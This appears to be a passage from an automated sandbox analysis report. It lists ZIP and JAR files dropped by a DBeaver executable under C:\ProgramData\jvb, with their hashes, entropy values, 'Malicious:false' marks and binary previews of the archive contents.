      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):16176
      Entropy (8bit):7.8758774598403605
      Encrypted:false
      SSDEEP:
      MD5:33A24EADE4517D82AAF9ACE08BCB25C3
      SHA1:0CFC650B9AF7DFA126967BD4BECA691281187510
      SHA-256:860B9610CC57510836C2EBF5574540D009B1A63F084DFF3B0D0957E84E636D0F
      SHA-512:EB15ADD9585BCBBDCBBD077A46AD40542DE3D84FF615F9C583087A3F781E5C0458070BE8A42E53B7ACC83FE5BF2AB6E0A551765B27291CDEFDAEBC8558B93F88
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..Ks.@...T...,.....[S........cv-.`.G3MC .~Z4..<.f..>}...m..?A..{..&Q_..(.).\...e;...;o..../.k.f.Qkh..Q.d..K..P.T.D.L....an....l..+.zu4C{..Q.V.GD..8&.U....$..AK..<.8I.7'...7...y.0n1`4.j.{bE.).3..%........n...~...|.}. $..??..A..;...0.!....L......F...FLB....P.....%E.....ord..i..7...(.7+..#.{..o..mq...L..+.WO.1........g...!{tq..:.h...3Q..C.8H=.)y.W..\o..!....K.ED.Mk.'.K..13.Z.eb...w.V....W.l.N.9.Z2.G..3.%.Z2.......L..@q.U~L...7.:yc..6........}.3]...T{q..e..{......_..Y..#...........e..m.nQx.Qg..#.&....$.....a.;6k_...e.=.A....6.~...G....PK..o...4...Q...PK..........cX................META-INF/DBEAVER.SF..M..@...V..8&E....V.....cUP.../88....~.R..u...n.D.......'i2.:..n.......` +....0.hB.,..~.[.eH.^_...x..pB.F........9;z.Y{...za-;......6...Q.@...KL#H".y.....zHtM=..v......}..g...u.l....Q....6l.....`$d..H"W7.o.Hx..s.{.tw.q...e.UVF.g;0.f$.Y.]S......W.9.....T9j.&)...P.|...Sg0...d.b.. ...@.lb[_..0...Xp.....-.l
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):46526
      Entropy (8bit):7.848026798642883
      Encrypted:false
      SSDEEP:
      MD5:1246BE70FDF423276FD004748440F852
      SHA1:48E74556C3FA485C121A07DA32E8F6782BF52192
      SHA-256:9EDBD99DC8C61BCD65AED5F57D83D849752B2A8C24A0ECAA89085655987F33C4
      SHA-512:33F6E58C461A6BAD4CE21C9399C69F724F176480BA4EC9F84419524F6A46B86EDDC431F49D5687F7B15B5231304B895D0DA359388FDA7B07DEF22EE013562B71
      Malicious:false
      Reputation:unknown
      Preview:PK........'.cX................META-INF/MANIFEST.MF.W..H.}...cccc&..ho.. *"...}.(......P..E.6...N..aVU.'.R.Dh.iR.AB...J\...QR.z...T....Qz.M...x..Y..8I|.T.... . ."|{.....+i.b>F~..?/..9FK..)M..(p.bS....L.....T.>b.....p..........TST.....(.C..A....g'.sP.$.....]c.B@a.U....;'....|...yQN..&..$G.....A.A.....SD`.a............4J..]......t{SzZM.?6..G.?..p..-U;...[....G.....d..EJ.].<U.w......no.c.IR..7.....r....Xx.n..D......d.,..Y...Cp.oo...]aw+&..g..;.... .+...p.............o_...h....../...9....nono..1.p.c8......c|...s.{...y>.....$U7...dw.._.WZ./..4]*L...d...,]b.S.E.L(.cY.E..u.?..a..X...cr.j.......a;.Gg...w.T]Y..C3.w.p.8=..LSV..w..0.QT=...O...+6s]..:....8......V.5pN..f>l|.N.n...?..d.5C.....9]..A..+S...6&.B.~<...Mu.RZh.^.}.GG..y8d....}.......9.b...[.2.u..x.W...u.......R..S.\..X..$CA.Fs.Dh..K{..x...M.4..9..k...)......Y=...S&9......;..RN!.\..L...../!...8.C..F!]h.@........IH..2..L7.......@..'.!x..:..f).r~..h..s..'....n.pg:S.{..N...0|..............XQ..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):38220
      Entropy (8bit):7.90496391220895
      Encrypted:false
      SSDEEP:
      MD5:C30046EE63F21B9A008D7B3AD5BFA644
      SHA1:1C256295C2D79A4448AA677E592F28F15B1B576A
      SHA-256:1049E09221161D7B217F6CE84D1DECF9BDF6CA872847436BAA87A0A9C72299E9
      SHA-512:D44AE31C3EA5C866950EE351A9E3FD8EF6122368274CC44C4611CA27D9724CAB72FF2B4C09FC7FF31FE4425ADEDD784EC0EA9AC262A257D25F7693238B38DD4A
      Malicious:false
      Reputation:unknown
      Preview:PK........J.cX................META-INF/MANIFEST.MF.T..H.}....RSSI.AQ..:...QQP....hlh.4....\rbM.q2...k..Z.. @6.ic.....K..4..a....sC..Y.{.j......:.v...u^.1.|.Y..)..D..Q......a.X.6...o.....<q...=5..5b..k.....o....0...;.8f.Q..2.b(..]..._c.8...FI.R.o..3.6..S.3j.1.1l.Kao&t..&E)....i.R7...#.H.].Da.2.C....3p...je.........hb....k..?_.M.A&J.Z.w..dB...G..)7..('.!.S.X.....'.... ../m2.Kb%oy.......0...$v...W.<C.}y.........@.|.......}...Z.V^H..1...V.8hp|.1FNy...'.B>.4..]..[x.V.....y.t]O'.n..9.....1_MY.j...._.`..0...?2.%,...U.Y.s20V.k.F.-...M.......;..1!.......@<....8.t....7n...t...{[.#-..WL!N...v........z...V...n..A.....J.gW.......2j6A.U.......1..QyV...cb....[.)....^i....|...[.B..2..GMLc..s...F:.....8/D.^...y.C.....[........8...J.<@.......dW...%.......e.U.c./[._...;..=.........wU_T...]...|.I....>m7r_..y..{w.f.z.e..n.4..p.2%....cP,b.v....7..~......M~.../.......>.#...,..0w.\or3^>..ox..?9..}..O.....d...6Y.d..R..DrF:.{T..~..._..ol#.T..N.c.|
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):25876
      Entropy (8bit):7.798504785290633
      Encrypted:false
      SSDEEP:
      MD5:7AF2051218D337FCEE7717329A4E01E3
      SHA1:E7495DE3A01DF248273D6220224F2E7F09A4A3F0
      SHA-256:6652226EA33520C6F5F2AB3B58E077DAA0E2108C4664C5F86B96D22DE23D26C6
      SHA-512:E78BD852341B41000BE35F556E4CB3DD1970C10F664DF4C53EF75FE314C02BAF47DEB3CDFCFA0411B2C9FA340EA99CDD7463C9A52550B10C6F4DB5E184BC69C9
      Malicious:false
      Reputation:unknown
      Preview:PK........I.cX................META-INF/MANIFEST.MF.U.n.J.}G.....j".^ ,.(..l...../...tlwC.m...4KH&..Hytuu.9.N.u....h..$....$^.....n......8,X{.Ma.n.%.t-..T.>e...-.6..@x..9.....]\.....~.|n\:...}..|.S`..:Va...&....t...x......n..(....1..A....&w...\.5g^.j.[Z..1....b..93....`.C....`.....}.8..D.........\..2].:{\Y..)....@.Fo.)&>.d...]..w...m.U..)&.o3..&.3...p(..}...8>(.?....:.OY%...4...X......e...^......H.ds>T.+....o.L.FLq.*9E...._.*.S..&.hX.oy_.8...7...l.@...cr..+............].J.I..grt.T......sG.. . .BVz.m.K.j..=..n......O....V&.....w..q...K2;Yk.&.w/....ZT.m!.D$....\.o....}'W7v......L9..F.D.==qn.(-....5.......K8.%....^.I/!..DL.d..i..T.D..:z ...3..L......G.<.UD}@B.H]9...v6......=8..L....{ .i...<...%........%...#..8...1l.<.8.'....^.....O...f..V......h..i._X.7...3...0.4@9Dcb..$.g. ..v.ShF+.Nac ..p.Y.Z.Kl......z.......!).%d.Y4..B.....@u.4..6..Vj...L%..Je..p%T.........M.>C...$M.m........3T...(.BV....:.L..G._4.rGR'....Z.Z.n.m...;.....Q5^.....}.9..>.o.h*...~..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):125449
      Entropy (8bit):7.9301267175629695
      Encrypted:false
      SSDEEP:
      MD5:6DD2664A0EBF01AD36176ED48343A9CC
      SHA1:DAA2D0B724967AA83428155625791122ABBAFD50
      SHA-256:63D65E41CCC40248D375F02A6A2759035C45E56CB2EAB947321981593EBC931A
      SHA-512:33E7D296FEA57470B869E568968BD8EFE60D07B6F179944694188E3CBA38CD68C738B692DD2042AF38361AA682A8E67AF16AF84F3EFF2866DF75EACA3E10EFF2
      Malicious:false
      Reputation:unknown
      Preview:PK........#.cX................META-INF/MANIFEST.MF.Y[o...}o..Ct4.4#.....G-}6.c..../#.e..f.....t:......))..Z.V.":ix.euo.......l..........w.......|.C`..Q.........v....b.f_...p*..2..S/...s.......c.||.n.P..s'f.._.}r...}....4:.e9...t.yz.?e..1.. .../...z.Og81.+..Y...S.....9.....uX...iO....y..nV.iQ......<P.1...._.M.K..k..|.."t_.-.*l.j....c.:v.......b.Y..<.c.,.N.|..~....,....J./.._.0].....q....+....*......vr...a5..J?....h6P|..........8*.....~.....__.|...!.k?L.]2~Z....N.B.t.;...\QX.*....IM......F.C.g.x.....~q$.=....@#..&...z6..*..S.A._....Fq..&s>....N.u...D..E.BU.3.g..y...9...:I...$.iU.N. ..TYq...D..a...H[(...m:.j..p)m).a...(.......7.....38...V.3..\*....H..`....+.e.Ad.9......r.Z..X.3.KH.........Q.kt3r..h....KK....m.%..)...9.m.i....<..s..fu.}.5...j..2,...q.@./...X.4.R..4.'..&.._..m2.c.t........I.....h.7..`...^...E...l)>[\.B.g..N.^e.$...?.kP.Z..)+.P.a.V. .c...b....6.......&..K.'.G]......+.:.7...H.u...5K...:g.Y..:+.>6R..uN..-..E...0.n..?b........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):79752
      Entropy (8bit):7.829014898441327
      Encrypted:false
      SSDEEP:
      MD5:4D5EE445232A7325288C5816CD0F195F
      SHA1:84ED179E56A6C8941F2C1AD183C5C2A61D0FDCC9
      SHA-256:AE5BD2FFFC0BF559D02FEDEE98278271446C0FE2169F8D6D1B9AD3BEC756D4F0
      SHA-512:6BF478C6A2A79950B707ED7DC61314C1598046A7C8652EC797846511F936B8DF79CD8041090D682A5F8AF334D6A91B233ECC3CEF2B2CA8A058AF9C8FAE160FF5
      Malicious:false
      Reputation:unknown
      Preview:PK........p.cX................META-INF/MANIFEST.MF....}R.n.0..G.?D.*.....U...z(....=.d..'...J..N........Oi.+....!.g..!.m.9..$;w..X..3..)....=..u;......8..h.. ..H.U.<.a.%...I.....FK.qX.8..Wg..`..8.K.0.y\..v.R...|+rHq 1[3Pz.P..L.E.x.....9.k....w..0..Ly.+,.....!....r....u.....H...g....gJ{.........+..#B....]9.]...W...{....%d...V........9^Y.%.E.0#....1*.M.....zR..s...4.biD.t...V.r..`.._.D0l4..'l8..]...E....o...e[.PK......z.......PK........p.cX................META-INF/..PK..............PK........p.cX................org/..PK..............PK........p.cX................org/jkiss/..PK..............PK........p.cX................org/jkiss/dbeaver/..PK..............PK........p.cX................org/jkiss/dbeaver/ext/..PK..............PK........p.cX................org/jkiss/dbeaver/ext/wmi/..PK..............PK........p.cX................org/jkiss/dbeaver/ext/wmi/edit/..PK..............PK........p.cX............ ...org/jkiss/dbeaver/ext/wmi/views/..PK..............PK........p.cX..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):50199
      Entropy (8bit):7.971072662760973
      Encrypted:false
      SSDEEP:
      MD5:234F688141FBCD8DC91C47DD8B9028C8
      SHA1:8D8621896323496B4F489BF28AF585F4A620C3B4
      SHA-256:E958CFDE51BD47E18599FD58B02AE659B716E14842357E6A8809226112D0B097
      SHA-512:A7132EB04981060BEBBDA341DF1F54E710E55BAB3F6C833D6B25196826928EB972DC189E7DD8FAD735246FFA4202627793CC338DBF17F8B26F2C250947C5B23A
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..[..J...M..f29.A..8....E..-.VB..e.U....hk.g2.;.......0..m ......U(..|.."...?...z.b.6G;.*T.JM.J.r.v..B'k..5..HK(..T...._.NJ|.....W.G..2...;..d.....R.m!}...n.c...c....1V.........C~..9M.c..$~L?IjL.|n...T......F..%.O..O...k..f}..... %...p....O...K..fW...m..+..VA...#~.y..T............^.........n......|..{...0...?`...O.....h.....l].*...E.%.V..M..S..C..sy..\.8....N.........[..INp. R:....W...}I....V..(Z8Kmg..P.6.U.......E...p....Ug.I.g.0.+.H...n..?^+X..\Q..}...?.v:....g.........yo5.....~..K5...r...AT..[[|.o'..V...4Ay..iu_g...g...@7'.?.)...6...&..._..,.C......g.(...d...T.|0...H.g.i.....v...tH..gu.k.."..a?..c..#.rU?.....y.....38.'].,...d.2...S^q.Y.........(c.8.^..P.&.03...C{.[...+..9.....]..;.$9....Wc..XxR....PK.............PK..........cX................META-INF/DBEAVER.SF..K..P...&......Q..j2.P..E......\.p.{.....3.y...U.....2a\x.....5..X..1..mj.Q.........j.M.......D..~.T..d..ma......F.b= ...+.4.'Rc.t..L..M.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):351312
      Entropy (8bit):7.9628595669211215
      Encrypted:false
      SSDEEP:
      MD5:07B485A78139C9A37B65F85F504BCABC
      SHA1:BE4CD164887E8BCDF1E2F183B3E382F9236E74FD
      SHA-256:2EBB28133EDD23DDC08854D90CC2D4A81B75D6B38618B13C2394A0CF95FD9E94
      SHA-512:051569D05BAD4749CCB359E5961B988FFA7A225657BC0CF8CDA4D7BD7EAD0EDF826D10FCB8AD14A96A55D10910B88B28C1E138748070778AA383BDA397A7E612
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.[W...~.R.Ct.uu....l.>..t..b./W.jz...v...b.x.)K.3..Q.1.D..8........z.}\....... z.............^....@ l.yw....z.9.....x..].v.{?.....{......"..t.s...z.P......|Y..W`_.D.....g/.....Y.~.X...$.....l.....m.<...........+.....{1.6)~.......ER.e.m..n/.._.\.......v,...........G.....x....c|..G....k....}.'}..[...x..1.......^./.S......q..q..4{...z....._uq....xW./.{S.v..7u..~....a....A....d..........K{d@_..vi;q...=.M.......o..........[.{[e........a............._..^.^%.^..^.......^....uM~.W..&./...{.p....kk.p[7.Z.....2.I.9..>.....}y.ua.....O...k.8.&.....bKH%H.n...Nx2..Z!.......jB.....N...k.hg.......}]..w...#[.....Q..Q..Y?...m.......5..w.>...~.w.W..~~..z..~..6..bi.......@....;.E....`.S...+.h...7..v......N.\xK ..I.(.C..... u. .Y.J..R5.>..."i.....k.g.ha0..a....c...ZME...v...Z..y$.V.{.#.U#7 c.'t.Ed".>.40.x..\.[.i.Fb>..To...F...oZ....'...z....Bp..c2....j.2x.7.R(c.L..U......O.Fo..N..c..I...\.D/L).3...PR.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):588213
      Entropy (8bit):7.868233692008594
      Encrypted:false
      SSDEEP:
      MD5:66605148954509D75CA13C5C31FE9D33
      SHA1:D3E919E856D273EAEA9C2D6CA9B9BB94522DAB3C
      SHA-256:1A4D736B663421A1EFB44BE4C10FB132EF13BB2761BD128664B7B566F367FF2D
      SHA-512:32FA43C773D3F85B1156DF752CD1FBD8DE26DE2BF2EB5E8F31AF2794B4FCD849CF97F6B8F61682EE6B51AB5E9CA474B3199A3E56E818F6E44D915D2F4CBC92F3
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF...X.&z.@.Cc.8..O..$Q...H.^t...{...G.i*.:wn....."+%..Z+VD|._...2.......]R.....7...#.$......:../...vK.....0." ......E,......1h.K....l.....{..J?..%|}.........3(....CS...:e48Q..-(..O...........~...o...x........g..>..y.t..........mm).*O./.Um.[.%]...V<..-...%e....y..C...p.OF..."?..(.......4C........}{....[..}.._......6.I...xyRw.o^.....c..,.\Wm./...j.....{.=.V8u...........}.N...?.....g.........^..{|.>........o.R.........................{.z...]..!...O:..&y.?4... ....\...............s..h........o...............=k..Y..g....}....C....>...;o....i.._.../*......qH...[.u,.!.+..g.`YI.G.'.M.&..^G....y,..../..{.s.wJ.i}.i.......E.G..^@V.P.....!.....Au......yj.&...:.V...-"2.$i........u>DI..\......,nP.|.X.p....'.6&.......z........m..,=>.&~........7....n. .x.G..0..v..........f.`8....._w../cp....Ab.....V...........6..$..'WK{......y...S..Iq=.5...w.b......si...keQ.q%....V.%......h.l.......(.%.St...|.v.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):365584
      Entropy (8bit):7.908275516268522
      Encrypted:false
      SSDEEP:
      MD5:53819AE022506B2F01222D9C28D4CEDD
      SHA1:3EB7FF92C0E930897B173C249558213BF10FD32A
      SHA-256:C1B65C6642E1BF16C0A96C33A5BA1C206C411CCF69EB575A1E62B2C56D4D4E4B
      SHA-512:51F0F2C8446B315FF00AE8AEB41E89DB578B20CC2EC1251EBD758EDF20D0BBE34E51A12B27327ED79EA253FAB3008249F31EF917E89E8DE76C43F808591C482B
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.}Y.....1...6.vm..v$z.< ..!.......".M._.Qn].R*..}.. D8......%:E..m..!h.,........U.d..[...V..|q.zMO...... .B.....s5.......4.............O....[.........~_.M.vSr................e.x...&.......*B~m.....i.".n...]...u..*..0..o..J...i.?..%.........n~.r.f.A.L.?o_.............o..._.*..O..NNt.U..^....wg.b...n;..s.....'=..f..o~.q..97..O.......%..6..'.M.t.[=5........O..yW.."..........j~.;.+.i?...&.>...a~..m...3f.-.'.6.V5..x...&...k..4...c.....X_.tN{...UO.i...f.n>......]......<..m.3.m.....}...}...>.|^}..%U.|..*..6..&...z.+.`~r................j.......G^.-...mn.-*..}.........3$m.&.,._.n.......~T.....a../..']o.OJ...].`7.......].9Y2=Y.~....'/.`.C......E.]9/...s....o.3.~...4C..9[......EF....^.sn...8Y.u..N.o.<.{..N.(.....oA.?............|...38.._.9<;........._...MV.IV.EV.IVp..|^7.l...O...}....N..]8.O.'...hv...b.U.\........!.r...b.../......2....U.GI..v.|"......1.u..P...".Z.Hv..#.0.u;N..'....8.o.~
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1982653
      Entropy (8bit):7.883208573972571
      Encrypted:false
      SSDEEP:
      MD5:CB7075BAC1EC6F60BAE5BAEE70736DD5
      SHA1:3B39BCCB9A761FA6A2F3BB742B4C4DEE72F9CF90
      SHA-256:048E423EFB185E87E46A758253B35976DE4A4B36CF9B2D92C5DC3C2110677C61
      SHA-512:0AF0A3B4491F319AE82350DF3866B933CE74504199C0020A42757693258DBE21DF53EBD805D0F7A2FAD873DEE8DAA63EF362B7340FF7107F4D2012FD79CB0E6A
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..i..J.6......WGW.O....j.t=.`<./%O..y...5.s8.M..WW.S..AD8b.Z..Cv...6.fX7Q.........FtQ..)..Z.....wz.......6kx....u.'q..?./t........Y.n..?}Oty.....#............x...dQ._.....>......v."....E}..'Q.|..<+.0..&./i..#.....A....?..__..H...m.?.......c.o..m.n..D..O......W.yv....>....7z,...Sq..|.Z...........G_\...f._. ../i.'...{..Y3.4....r......k....~...o._.y..=.W}.U..._.../n;..>o.7...K3.{y.S.->.......<.R....-.........y.2J...hTtm....L..5y.hk..|..9..)..|..0.l._..Q._sOK-.....D?...."I.4.J.sOK......_.E..m{?-...}k?.t.....5..../~.....W.]\....Vy..n.R......:<.u....yoM...sO.m^x..V.;..{k.s....%.d..=}4..'...t...?...}t.K..F_[<;U...|R.6....*.r..."%.5.6..........=}......,.......Y...a.>m..n..a...O....~F.w.,.Y...2...Q{[..9.>..%.........:....n..=->..>e#....n......J|..........E.2..^l..>vw..y....9._....A~<.........2<...S..........M.........3...SS|...6J..q.Wt...........}...Y.?..G...........n..R?<....[.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):24704
      Entropy (8bit):7.8914495195524506
      Encrypted:false
      SSDEEP:
      MD5:9AFCE4058371B2EE8E20C4A843E7CE94
      SHA1:92308FB03D6628109159713FD7BB704B3B822BA4
      SHA-256:F04FE5E1445BE6703E47CF649901359D8C9583B1F5DF8859E09F6A1B8DE0E30A
      SHA-512:E19F698159E6F6ABBAD926055B3CD3483AF2CDBCED32512D762E6AA1ED2410E104F2FA83B0D40DF0E6AAE734CBDE1216DAEEF3F6CF22CB771D33605807A1AECB
      Malicious:false
      Reputation:unknown
      Preview:PK........$.cX................META-INF/MANIFEST.MF..]..H...M..d..t...?['^((......l.(..(.*....v7..3N23...8..y..R...r!e....p..$.R....8..9.f..<......v.j.Z..*5.U..f|..........rI&.0.|..'..@.xW...Ej.#.....o.8...HN...#e....8.!..`y#.ad..cQo.C...~...'...R..).L.......P.y.d9N......p'.jM....0..B^...<....Pzc._.r[.p9.i9.....;.P.-.1A..o......}.q(..r.#.e...A.c..9.......G..K..sf.7........2......a1.....7.,.t....|x.uG ....!}.+...?.K.R!'...w9.).b.*.LY[...4......r..z|......Y.;.E:j.Wu..H.i.)...'.."....^.f...U;...EB...v...d..|V..z..US.5>9;%3F.-N.P....jw.y.......wF:....^.....d9k.s...h.}...1..m`..@.T..vj...{....e..+.@...-|...$..7.V..c.h....Y.($z..9.a..3EN...p4..Z.\{wim..{.:!...znKy....., ..w...z|...v.).M...Z{[...X}..Ne."...p.....7.H...6..8..#.J..8B....bv...x.`.i8..^.....,.h.l..0....2.[...x6.....8;...2.^.....,.6.:.....t..i_.uw..\...+9.p...C.f5_.%.hx<.,n.j...lG_.OA..*H....oPK...!0S...H...PK........$.cX................META-INF/DBEAVER.SF..K..F.F.-..`.E"d...K....x..`.x..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):29133
      Entropy (8bit):7.891938011895912
      Encrypted:false
      SSDEEP:
      MD5:5C77BF661265E6123E21816209424DE0
      SHA1:B055D774718DFB52983757FA7B02EE7488BDFABF
      SHA-256:C88717D2B06DCF344769792E0A9D7FAB3DD567D2437AE066A9C4CE1D629DC5C5
      SHA-512:EEA0FBFAE1991A7DDE3B540C3100F10A4EDFF091590D0D403708872D128EB5783811B1E820761D7FF3286D7852A20FB73807CA73700E6151E22F351DE487FB2E
      Malicious:false
      Reputation:unknown
      Preview:PK........%.cX................META-INF/MANIFEST.MF..[o.:.....ht4jE........;$...2r..L.;..!......)#.> !o..[k/...h.)..0...zI..b.......b.......E.^R$E..RU...mVi....@....H..J `...b/....r*..{$.....W..I.Sq.^..K..-.(.a.1..?T..g...}+..."..;...&@...H.2....o.".q.{.....;......8.2a....6.}.H=...C...........Tn...)`.zI(.L.MQ.+o..#....c.X(....3..7........6.]...(&..L......+uss.'.a.s...F.H.U......@.n.....B.|B}$@.k.........W..>.....j.....__.(....vq.....(,..n..h..6.y.x.Hb..ul.=.F.~[.[...lf..K`...8.....\.x. .....E.C..D.....fq].T..ul.B,..v.X[.....q.V.2Z...t....]F...(...1$...|.C.IJ.bn...&s...?,..)2..myS~..2....m..Z..i&f..:..................X.l3....eWMW.......n...\wq.$............Y.'..V[....j.l.tI...........>....*[+.'.@~.Mfe 9O......S...m..<..TE.=.jS...C.........v.,.A.+.. ..d.K(.|i..:.E..Wd-..v7B9.Lc.m6....U..s....ef..q...yo.)..N.!N._]../..Fo..A...q.57.N....L..p..<x....k....._...."CWQesN.;..v...".....u".'..ta.>....k....:z.u.6.j3O3...8\/-7....y..]..)..v...>L......$?Gv
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):48893
      Entropy (8bit):7.887491860631972
      Encrypted:false
      SSDEEP:
      MD5:176BDB3BDFAA6813F15369105F1F12A4
      SHA1:8818A4384BB53D326369F7D78256D25BEE798D34
      SHA-256:91E5DE0B84A1039FF3F413D19A916C9C143187531922B7A3E39776E6AEAC0E66
      SHA-512:E2733490F0E0798E0F987EEF314208E2F9C9ED1EB6F5B8BF09508203672E063B8B288A3C0FA3D0A8AA72497F3A932C63A2ECEDF09B8768BB3B765DC827394198
      Malicious:false
      Reputation:unknown
      Preview:PK........F.cX................META-INF/MANIFEST.MF..Ys.L...S..`.5..L9....[s....7...XZlvzA..8.8Kbj..X.9.}.>k.Z1..L.t.0L..Z....)..;....8...![......6.d.l..V.;.t_sm`..5`r{#!`..>..4vCp.>Y..n_T:........]5)A.E9...?T.6.... ...e.v..$.....y.?..7~p.40>4(..........D./.?..hq|..;._..!.0..TW.........".9.3N..*O...w}.H....S.-...9....7+.Q.....0..0.qV.I........_.N.@..TQ.z>......"....{........gu...OP......A.t..ga.s..$Q.w..'...V....@I.U.p.....y-#~.S.R.a.j..`....U..t......$..X..._>.)...........4....E...hc......W..}......X..!frZ..m..My.\.0.+`?JW......>...y.g(d..0....$6.*..L.....%)@....~.`.iY.%.g.c.D3..~.a"s....F...`...>....=w.Q...........~.hR.`.Z.......w.)....\8..O..s.....N...H.A[..7..........>.6z.S!.Dy.Q..*.<J.n...k..*j'.....v\.....y.|W.^.B.b..a.1+....j.b].:.C..<9e.O.F.....}IP.^._.Gfg;Y1.m..z`B...Q.M9%....v.....[....(.TQ,P............r%.{.Z....N}l5.x.O.....e.fj.(.u......D)..!..cou.vh+..I...|..i._..N.....R.]v.N:.R..o.....e..Hpm..1.a...P.>Z..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):37000
      Entropy (8bit):7.844868841323439
      Encrypted:false
      SSDEEP:
      MD5:4B9207AE066357CF67048ED78ED33E8F
      SHA1:5259FCD70E636CC6D85F06EEEFE62BE3E81215FB
      SHA-256:427B058BECBCD64E9E6CFAE6050B1CA7128B04A8146D597F220F266F176B4217
      SHA-512:18CF21A85B439921B85474AE59C7409A99364F4BFAF1C2FC55F6DDAF1A4E35B847F17F139ECC7E971E332E85AB4F312E3CACE57C9A39C03C4CBCB1330B7BBE41
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.V[....~.......p."..D?..x.Q._6.J(...@._.........y...KeV......f.L .;..b.....^m..kF..r.......T.L.g8.c[.kvZ..N.....0.......u)....&..W..5d..C.S.J..*2..58u.....C.,.8.!.f.E.A!t_2......B...AJ..|'0.C...O)..;..VP,.....5.!p..uK.WC.kXtSxt.r..K.A..^. ..4..;.o.E.....o.......E...73..0.!Iqq.(..!....J....2.A.%.B..!L...C1.)......>.".(..iY.e.$... (.. ?}.#np.."...........<a....&.M.7.E..bj.;...;QI.[.......6.p..1F......:......S..Y&.7....1KQTf....k5.....N.*. .C....m..<...._^....1z_.._...m}........R.f>..<....U....Z..e.u*.........f.G....>SP.......S.u.....%w..~.N_.K.t..~...l.R| _.e....>W.D\...j..q..=F.8A..do.W.....$...........y.J0J.N!...k.I..z....D.b...*..;.-.K!..AK..Br...IR'N...E.n.m....L.F..R.m.P8.t.R^x.L..h}.N..Q.DI."..w...5.......{f...4.....?.g....e=^..k..........Z....p.........H1...)=.?BJ...]0..j......u..S.5$NX3H.<.DGPO.p0.D..#.=.../.... .4v.%.e..6....Hm.e.....C......n8^.M..J....o4ol....Z.w-.....d..\).
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):541368
      Entropy (8bit):7.955640507894611
      Encrypted:false
      SSDEEP:
      MD5:279C966546F811723A4CBBBF1F22CA52
      SHA1:DA0382A6920AAF1A0C327D80DE9832082A91B3E2
      SHA-256:C0C21631DBB07F8159F49FB6CBCC7085744915361F2DFB69EEC693D3EA918F1F
      SHA-512:F68A1BA64F685163B900B485D975B8873C9FD83195562C263986B711641588103C1B0805263B6C57BE882B6828B89F7E5D13B28B3D70A3A3981E82CF65E49921
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.}W....{G.....b&.}.V...A.............(s\w....r.@.&s..6.%;e..m...4mR....}.....'....g..u.-.n.~f$E..o..F7............o..8C.|I._.......o.S}...........]....?.c..o.FWM...<....\.A...DI.5...p.<.^n...K.%m........M.(..e..wM.. ......./.}.. ..6..Y^.........ny..I.e.r...Nu.t.../s.w....K_|.._~.n..wok........-Oz..t....;e./o.<.........&[nY...x..mW5.(.nY...]..f.=...eY.o.I.N....../.....>i.?^...a..I.._....4}.-..]..<h....a../...o....7..^.>......IA...O".......I..m..4.1p.8m./.*.DU......^Wfy.OSR<....I..I.<...7A..o._'/_xz...}.%-./u.ta...&T.<'O.....o.~....=.C..t.o...].U.r...b..7...l.W.vj.U..6J.....s.,............gpt...{x1..C........_..6..<..:..u(p1{G.^,=h..w..)..o..=).........`.h..?....T......c;.un.s.6.E-X.b..x....g.^%...-..4_...^...?.`...>...2Y.=a.Eu..;?.b...M....E..u.P.....I.......lO.}...Y..S...A2.M....x8...@..Xx?.[.}.._.".....7.%.wux6...A..5..9.-5..a6f*Pp6... ....B...U.2x.N..<....O..pv.._xg.......V.Y..*....\
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):15090
      Entropy (8bit):7.829514960964992
      Encrypted:false
      SSDEEP:
      MD5:A392D08E35D74608DC689BA7395DB375
      SHA1:A7C6DEBF061192EAB3DCA08831E4B1E755467D9E
